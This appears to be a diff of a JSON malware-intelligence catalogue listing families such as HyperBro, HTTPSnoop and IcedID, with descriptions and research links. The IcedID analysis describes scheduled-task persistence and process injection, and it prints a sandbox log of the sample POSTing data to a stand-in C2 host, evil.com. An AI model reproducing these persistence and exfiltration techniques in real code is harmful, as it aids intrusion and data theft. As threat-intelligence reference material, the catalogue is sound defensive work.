"https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/", - "https://www.youtube.com/watch?v=h3KLKCdMUUY", - "https://cofense.com/houdini-worm-transformed-new-phishing-attack/", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", - "https://threatpost.com/ta2541-apt-rats-aviation/178422/", - "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html", - "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", - "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html", "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", - "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", - "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", - "https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/", - "http://blogs.360.cn/post/analysis-of-apt-c-37.html", - "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/", - "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/", - "http://blog.morphisec.com/hworm-houdini-aka-njrat", - "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37", - "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html" + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html" ], "synonyms": [ "Hworm", @@ -28178,17 +29492,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", - "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", - "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://www.secureworks.com/research/htran", - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", + "https://www.secureworks.com/research/htran", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", + "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" ], "synonyms": [ "HUC Packet Transmit Tool" @@ -28203,12 +29517,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", - "https://attack.mitre.org/groups/G0026", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://attack.mitre.org/groups/G0026", "https://threatconnect.com/blog/the-anthem-hack-all-roads-lead-to-china/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-union" ], "synonyms": [ "HttpDump" @@ -28223,9 +29537,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", + "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", - "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf" ], "synonyms": [ "httpdr0pper" @@ -28235,13 +29549,41 @@ "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", "value": "httpdropper" }, + { + "description": "Cisco Talos states that HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsnoop", + "https://blog.talosintelligence.com/introducing-shrouded-snooper/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f585fba9-4a75-4752-bfdd-a0049e4d8d63", + "value": "HTTPSnoop" + }, + { + "description": "The HTTP(S) uploader is a Lazarus tool responsible for data exfiltration, by using the HTTP or HTTPS protocols.\r\n\r\nIt accepts up to 10 command line parameters: a 29-byte decryption key, a C&C for data exfiltration, the name of a local RAR split volume, the name of the multivolume archive on the server side, the size of a RAR split (max 200,000 kB), the starting index of a split, the ending index of a split, and the switch -p with a proxy IP address and port", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader", + "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/", + "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", + "https://securelist.com/lazarus-threatneedle/100803/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "50723d62-ecf2-49de-9ce2-911045ae63f0", + "value": "HTTP(S) uploader" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", - "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf" ], "synonyms": [], "type": [] @@ -28254,9 +29596,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader", + "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", - "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html" + "https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/", + "https://medium.com/@morimolymoly/hui-loader-malware-analysis-note-4fa0e1c791d3", + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf" ], "synonyms": [], "type": [] @@ -28338,33 +29682,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", + "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/", + "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt", - "https://securelist.com/luckymouse-hits-national-data-center/86083/", - "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/", - "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", - "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", - "https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/", - "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html", - "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", - "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10", "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx", - "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", - "https://www.intrinsec.com/apt27-analysis/", - "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", - "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://www.intrinsec.com/apt27-analysis/", + "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel", + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", + "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf", + "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/", + "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", - "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", - "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel" + "https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/", + "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", + "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html" ], "synonyms": [], "type": [] @@ -28391,18 +29736,19 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl", "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", - "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf", - "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", - "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf", - "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx", - "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf", - "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", - "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", - "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel", + "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", + "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx", + "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", + "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf", "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://twitter.com/ESETresearch/status/1594937054303236096", - "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel", + "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html" ], "synonyms": [ "FOCUSFJORD", @@ -28441,180 +29787,186 @@ "value": "Icarus" }, { - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://unit42.paloaltonetworks.com/atoms/monsterlibra/", - "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/", - "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", - "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view", - "https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html", - "https://isc.sans.edu/diary/29740", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol", - "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", - "https://github.com/f0wl/deICEr", - "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/", - "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f", - "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/", - "https://eln0ty.github.io/malware%20analysis/IcedID/", - "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://thedfirreport.com/2022/04/25/quantum-ransomware/", - "https://blog.group-ib.com/prometheus-tds", - "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", - "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships", - "https://github.com/telekom-security/icedid_analysis", - "https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://www.ironnet.com/blog/ransomware-graphic-blog", - "https://twitter.com/embee_research/status/1592067841154756610?s=20", - "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", - "https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344", - "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", - "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", - "https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/", - "https://malwation.com/icedid-malware-technical-analysis-report/", - "https://www.youtube.com/watch?v=YEqLIR6hfOM", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", - "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2", - "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/", - "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.binarydefense.com/icedid-gziploader-analysis/", - "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", - "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan", - "https://intel471.com/blog/malvertising-surges-to-distribute-malware", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/", - "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", - "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/", - "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b", - "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/", - "https://blog.unpac.me/2023/05/03/unpacme-weekly-new-version-of-icedid-loader", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", - "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html", - "https://twitter.com/felixw3000/status/1521816045769662468", - "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html", - "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", - 